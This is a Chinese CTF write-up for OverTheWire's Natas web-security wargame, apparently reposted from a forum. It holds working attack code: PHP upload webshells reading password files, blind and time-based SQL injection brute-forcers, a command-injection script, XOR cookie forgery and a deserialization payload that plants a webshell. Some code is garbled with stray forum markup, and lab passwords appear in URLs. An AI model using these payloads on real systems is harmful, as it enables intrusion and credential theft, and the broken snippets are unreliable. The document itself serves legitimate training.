web安全Wargame—Natas解题思路(1-26)
前言:
接下来给大家分享一下,1-20题的WriteUp。
Natas0:
Natas1:
Natas2:
Natas3:
Natas4:
Natas5:
Natas6:
Natas7:
Natas8:
Natas9:
Natas10:
Natas11:
01
02
03
04
05
06
07
08
09
10
|
function xor_encrypt( $in ){
$key = '<censored>' ; #预定义参数key
$text = $in ; #输入参数
$outText = '' ; #输出参数
// Iterate through each character
for ( $i =0; $i < strlen ( $text ); $i ++) { # for 循环,遍历输入参数
$outText .= $text [ $i ] ^ $key [ $i % strlen ( $key )]; #将输入参数对应位和key对应位异或,key位数不够则从头循环,结果存到输出参数
}
return $outText ; #返回加密结果
}
|
01
02
03
04
05
06
07
08
09
10
11
12
13
|
<?php
$defaultdata = array ( "showpassword" => "no" , "bgcolor" => "#ffffff" );
$data = 'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw' ;
function xor_encrypt( $in , $out ) {
$key = '' ;
$text = $in ;
for ( $i =0; $i < strlen ( $text ); $i ++) {
$key .= $text [ $i ] ^ $out [ $i ];
}
return $key ;
}
echo xor_encrypt(json_encode( $defaultdata ), base64_decode ( $data ));
?>
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
|
<?php
$defaultdata = array ( "showpassword" => "yes" , "bgcolor" => "#ffffff" );
function xor_encrypt( $in ) {
$key = 'qw8J' ;
$text = $in ;
$outText = '' ;
// Iterate through each character
for ( $i =0; $i < strlen ( $text ); $i ++) {
$outText .= $text [ $i ] ^ $key [ $i % strlen ( $key )];
}
return $outText ;
}
echo base64_encode (xor_encrypt(json_encode( $defaultdata )));
?>
|
Natas12:
1
2
3
|
<?php
system( 'cat /etc/natas_webpass/natas13' );
?>
|
Natas13:
1
2
3
4
5
|
GIF89a
<?php
system( 'cat /etc/natas_webpass/natas14' );
?>
|
Natas14:
Natsa15:
1
|
$query = "SELECT * from users where username=\"" . $_REQUEST [ "username" ]. "\"" ;
|
1
2
3
4
|
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
|
1
|
'username' : 'natas16" AND password LIKE binary "%s"%字符'
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
|
import requests
url = "http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/index.php"
chr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
payload = r 'natas16" AND password LIKE binary "%s" #'
#使用like模糊查询不会区分大小写,要带上binary。
key = "%"
while len (key) < = 32 : #循环32次
for i in chr : #确定字符
a = key[: - 1 ] + i + key[ - 1 :]
print a
req = requests.post(url = url,data = { 'username' :payload % a})
if "This user exists" in req.text:
key = a
print key
print key #输出key
|
1
|
passthru ( "grep -i \"$key\" dictionary.txt" );
|
1
|
passthru ( "grep-i " ( $grep ^a etc/natas_webpasswd/natas17)wrong \ " dictionary.txt" );
|
01
02
03
04
05
06
07
08
09
10
11
|
import requests
url = "http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/"
key = ''
char = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' [ / color][ / font][ / align][align = left][font = 宋体][color = Black]
[ / color][ / font][ / align][align = left][font = 宋体][color = Black] while len (key) < 32 :
for i in range ( len (char)):
payload = { 'needle' : '$(grep ^' + key + char + '.* /etc/natas_webpass/natas17)wrong' , 'submit' : 'Search' }
req = requests.get(url = url,params = payload)
if 'wrong' not in req.text:
key + = char
print key
|
Natas17:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
|
import requests
[ / color] [color = Black]
url = 'http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/index.php'
key = ''
for i in range ( 1 , 33 ):
a = 32
c = 126
while a<c:
b = (a + c) / 2
payload = r 'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(2),1) and "" like "' % (b,i)
try :
req = requests.post(url = url,data = { "username" :payload},timeout = 2 )
except requests.exceptions.Timeout,e:
a = b + 1
b = (a + c) / 2
continue
c = b
key + = chr (b)
print key
|
Natas18:
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151625jpb1r9db90r5sb6j.png.thumb.jpg)
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151649u57b1omooqmmm657.png.thumb.jpg)
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151658az7pcr74f8qmfxrq.png.thumb.jpg)
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151706qhyeemtbhbrthhq9.png.thumb.jpg)
Natas19:
1
2
3
4
5
6
7
|
a = []
for i in range ( 30 , 40 ):
for j in range ( 30 , 40 ):
a.append( '%d%d' % (i,j))
with open ( "1.txt" , "w" )as f:
for i in a:
f.write(i + "\n" )
|
Natas20:
1
2
3
4
5
|
查看第一个网页源码,发现主要功能就是判断session[admin]=1后显示密码;
if ( $_SESSION and array_key_exists ( "admin" , $_SESSION ) and $_SESSION [ "admin" ] == 1) {
print "You are an admin. The credentials for the next level are:<br>" ;
print "<pre>Username: natas22\n" ;
print "Password: <censored></pre>" ;
|
print "Password: <censored></pre>";[/mw_shl_code]
1
2
3
4
5
6
|
// if update was submitted, store it
if ( array_key_exists ( "submit" , $_REQUEST )) {
foreach ( $_REQUEST as $key => $val ) {
$_SESSION [ $key ] = $val ;
}
}
|
Natas22:
1
2
3
4
5
|
if ( array_key_exists ( "revelio" , $_GET )) {
// only admins can reveal the password
if (!( $_SESSION and array_key_exists ( "admin" , $_SESSION ) and $_SESSION [ "admin" ] == 1)) {
header( "Location: /" );
}
|
1
2
3
4
5
6
|
// if update was submitted, store it
if ( array_key_exists ( "submit" , $_REQUEST )) {
foreach ( $_REQUEST as $key => $val ) {
$_SESSION [ $key ] = $val ;
}
}
|
1
2
3
4
5
6
7
8
|
if ( array_key_exists ( "passwd" , $_REQUEST )){
if ( strstr ( $_REQUEST [ "passwd" ], "iloveyou" ) && ( $_REQUEST [ "passwd" ] > 10 )){
echo "<br>The credentials for the next level are:<br>" ;
echo "<pre>Username: natas24 Password: <censored></pre>" ;
}
else {
echo "<br>Wrong!<br>" ;
}
|
Natas24:
01
02
03
04
05
06
07
08
09
10
|
< ?php
if ( array_key_exists ( "passwd" , $_REQUEST ) ) {
if ( !strcmp ( $_REQUEST[ "passwd" ] , "<censored>" ) ) {
echo "<br>The credentials for the next level are:<br>" ;
echo "<pre>Username: natas25 Password: <censored></pre>" ;
}
else {
echo "<br>Wrong!<br>" ;
}
}
|
Natas25:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
function setLanguage(){ #选择语言
/* language setup */
if ( array_key_exists ( "lang" , $_REQUEST ))
if (safeinclude( "language/" . $_REQUEST [ "lang" ] ))#检查输入
return 1;
safeinclude( "language/en" );
}
function safeinclude( $filename ){ #检查输入参数
// check for directory traversal
if ( strstr ( $filename , "../" )){ #禁止目录遍历
logRequest( "Directory traversal attempt! fixing request." );
$filename = str_replace ( "../" , "" , $filename );
}
// dont let ppl steal our passwords
if ( strstr ( $filename , "natas_webpass" )){ #文件访问控制
logRequest( "Illegal file access detected! Aborting!" );
exit (-1);
}
// add more checks...
if ( file_exists ( $filename )) { #检测目录是否存在
include ( $filename );
return 1;
}
return 0;
}
function logRequest( $message ){ #请求日志
$log = "[" . date ( "d.m.Y H::i:s" ,time()) . "]" ; #时间日期
$log = $log . " " . $_SERVER [ 'HTTP_USER_AGENT' ];#加http_user_agent
$log = $log . " \"" . $message . "\"\n" ; #加上message
$fd = fopen ( "/var/www/natas/natas25/logs/natas25_" . session_id() . ".log" , "a" ); #将日志信息写入文件
fwrite( $fd , $log );
fclose( $fd );
}
|
Natas26:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
class Logger{
private $logFile ; #三个私有参数
private $initMsg ;
private $exitMsg ;
function __construct( $file ){ #类创建时调用
// initialise variables #初始化变量
$this ->initMsg= "#--session started--#\n" ;
$this ->exitMsg= "#--session end--#\n" ;
$this ->logFile = "/tmp/natas26_" . $file . ".log" ;
// write initial message #写入初始信息
$fd = fopen ( $this ->logFile, "a+" );
fwrite( $fd , $initMsg );
fclose( $fd );
}
function log( $msg ){ #写入信息
$fd = fopen ( $this ->logFile, "a+" );
fwrite( $fd , $msg . "\n" );
fclose( $fd );
}
function __destruct(){ #类销毁时调用
// write exit message #写入退出信息
$fd = fopen ( $this ->logFile, "a+" );
fwrite( $fd , $this ->exitMsg);
fclose( $fd );
}
}
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
|
<?php
class Logger{
private $logFile ;
private $initMsg ;
private $exitMsg ;
function __construct(){ #注入信息
$this ->initMsg= "" ;
$this ->exitMsg= "<?echo include '/etc/natas_webpass/natas27';?>" ;
$this ->logFile= "img/aaa.php" ;
}
}
$test = new Logger();
echo serialize( $test );
echo "\n" ;
echo base64_encode (serialize( $test )); #显示base64编码后的序列化字符串
?>
|
END~
大家有任何问题可以提问,更多文章可到i春秋论坛阅读哟~
转载于:https://www.cnblogs.com/ichunqiu/p/9554885.html
web安全Wargame—Natas解题思路(1-26)相关推荐
- Leetcode 171. Excel表列序号 解题思路及C++实现
解题思路: 26进制转10进制.没啥可说的了. class Solution { public:int get_26(int n){int res = 1;while(n > 0){res *= ...
- [网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了WHUCTF部分题目,包括代码审计.文件包含.过滤绕过.SQL注入.这篇文 ...
- [网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了Windows PE病毒, 包括PE病毒原理.分类及感染方式详解,并通过案 ...
- 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
对于想学习或者参加CTF比赛的朋友来说,CTF工具.练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助. CTF在线工具 首先给大家推荐我自己常用的3个CTF在线工具网站,内容 ...
- 实验吧-密码学解题思路及答案(一)
1.JS 解题链接: http://ctf5.shiyanbar.com/crypto/2.html eval(function(p,a,c,k,e,d){e=function(c){return(c ...
- [xueqi]ISCC 2019 writeup 信息安全与对抗-解题思路xueqi
ISCC 2019 writeup-全国大学生信息安全与对抗技术竞赛 解题思路xueqi WEB Web1 题目地址: http://39.100.83.188:8001 <?php error ...
- 2020最新中高阶Android面试题总结 下(附解题思路)
写在前面 这些面试题是我在去年换工作的时候整理,没有重点.包括java基础,数据结构,网络,Android相关等等. 适合3-5年工作经验,打算跳槽面试的中高级工程师.由于内容过多,将会分为上下两部分 ...
- 剑指offer第二版答案详细版(带详细解题思路)
1.滑动窗口的最大值(剑指offer原59题) 解题思路:其实是一个队列的问题,用一个队列去维护当前窗口中的所有元素:首先将超出窗口中的队头元素先删掉,然后将新的元素插入当前窗口中,插入时要判断新插入 ...
- Leetcode 168. Excel表列名称 解题思路及C++实现
解题思路: 相当于实现了一个10进制转26进制. 要注意减 1 . class Solution { public:string convertToTitle(int n) {char a[26] = ...
最新文章
- opencv图像操作:读取,裁剪,保存,缩放,遍历和读取文件夹图片
- [Window] .MUS 0x80070422 Error
- cordova 蓝牙_Ionic通过Cordova插件使用设备能力
- No result defined for action
- 中石油训练赛 - 小说(最短路+二分)
- textarea 换行_textarea自动换行方法总结
- linux内核开发_Linux 内核的代码仓库管理与开发流程简介
- virtual box一直正在加载文件_Linux基础导航与文件管理
- 基于JAVA+Servlet+JSP+MYSQL的人力资源管理系统
- docker阿里云加速器
- 日常开发中,String类中常用的方法
- 前端个人博客案例模仿
- 深入浅出面板数据分析
- Win2003域之组策略应用
- 督查督办管理系统在企业管理中起到的作用
- APP被Rejected 的各种原因翻译(转)
- grub2命令 linux启动盘,Grub2 制作多系统U盘启动
- 非线性微分方程有限差分解法
- Windows开启FTP服务
- 水平耀斑_搜索引擎提交的内容:引发耀斑